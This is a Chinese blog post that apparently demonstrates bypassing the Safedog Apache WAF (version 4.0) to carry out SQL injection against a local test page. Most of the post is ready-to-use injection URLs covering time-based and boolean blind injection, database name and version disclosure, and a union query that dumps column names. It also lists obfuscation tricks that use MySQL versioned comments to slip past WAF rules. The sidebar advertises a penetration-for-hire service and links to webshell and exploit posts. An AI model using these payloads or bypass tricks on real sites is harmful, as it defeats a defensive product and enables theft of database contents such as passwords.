欢迎来到【血梦博客】 今天是:2021年03月03日 星期三
站长联系QQ:635948183
最近出现好多服务器安全软件 帮助站长提高web服务器安全 今天来说说 过安全狗waf注入
前提web页面存在注入漏洞
测试开始本地搭建环境
环境
安全狗(APACE版)V4.0 防护规则全开
绕过
1. 延时盲注
http://192.168.6.145/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+
2. 布尔盲注
http://192.168.6.145/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+
3. 查库名/用户名
http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -
4. 查版本
http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -
5. 联合查询
http://192.168.6.145/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -
技巧
1. union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)
2. select password from => select password*1.from user => select password from (user)
3. version() => {/*!f*/version()}
- 上一篇:浅谈PHP防注入
- 下一篇:PHP 函数漏洞总结
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- sql注入系列之(bypass waf 1)
- sql注入系列之(bypass waf 2)
- 技术讨论 | Fuzz绕过安全狗4.0实现SQL注入
- 最新过安全狗注入语句
- 包含文件结合phpinfo反弹交互shell
- 从AST到100个某知名OA前台注入
- 实战中应急响应溯源思路
- 关于APP渗透测试的实践与思考
- 一次SQL注入到代码审计之路
- CVE-2020-8816: Pi-hole中的远程代码执行漏洞分析及复现
- 一文详解Webshell
- 技术讨论 | 某真实渗透实践案例分析
- 窥探裸聊诈骗背后黑色产业链的一角
- php代码审计学习之函数缺陷
- 记录一次赌博网站渗透测试,有钱老板背景调查
- GitLab任意文件读取漏洞CVE-2020-10977
- 挖洞经验 | 一次性验证密码(OTP)的简单绕过
- 主机安全:洋葱Webshell检测实践与思考
- 解密无文件攻击的各种姿势及最新检测方法
- thinkphp漏洞集合与复现
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-